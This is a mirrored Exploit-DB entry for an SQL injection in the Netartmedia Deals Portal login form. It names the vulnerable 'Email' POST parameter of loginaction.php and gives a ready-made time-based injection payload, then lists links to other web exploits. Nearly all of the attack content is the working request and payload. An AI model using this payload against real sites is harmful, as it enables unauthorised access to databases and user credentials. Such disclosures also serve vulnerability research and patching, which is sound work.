Netartmedia Deals Portal – ‘Email’ SQL Injection

Exploit Database
16 阅读

作者： Ahmet Ümit BAYRAM

日期： 2019-03-20
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/46582/

# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/dealsportal/
# Demo Site: https://www.phpscriptdemos.com/deals/i
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email (POST)
# Attack Pattern:
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login

last Exploits
Netartmedia Deals Portal – ‘Email’ SQL Injection的更多信息

Emby MediaServer 3.2.5 – SQL Injection：
SOA School Management – ‘access_login’ SQL Injection：
mPDF 5.3 – File Disclosure：
Proticaret E-Commerce Script 3.0 – SQL Injection (1)：
Karenderia Multiple Restaurant System 5.3 – Local File Inclusion：
Cockpit CMS 0.6.1 – Remote Code Execution：
Katalog Stron Hurricane 1.3.5 – Remote File Inclusion / SQL Injection：
Online Documents Sharing Platform 1.0 – ‘user’ SQL Injection：